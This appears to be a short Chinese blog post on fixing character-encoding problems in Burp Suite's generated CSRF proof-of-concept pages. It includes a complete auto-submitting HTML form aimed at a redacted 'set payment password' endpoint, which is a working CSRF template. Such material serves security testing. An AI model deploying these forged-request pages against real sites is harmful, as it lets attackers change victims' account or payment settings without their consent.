文章目錄

burpsuite csrf poc 乱码问题
关于burpsuite生成的csrf poc的方法。路径为:右键-> engagement tools ->generate CSRF Poc。

11

burpsuite自动生成csrf poc的功能已经很强大了。默认可以生成自动上传文件的poc了。对处理中文字符和一些特殊字符时有一些问题。

11

解决办法: 添加文件编码的meta,value里直接写中文。添加自动提交。

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>用户中心-设置支付密码</title>
    </head>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form name='vul' action="xxxxxxxxxxx/set.html" method="POST">
      <input  name="sName" value="肖正良" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.vul.submit()</script>
  </body>
</html>
文章目錄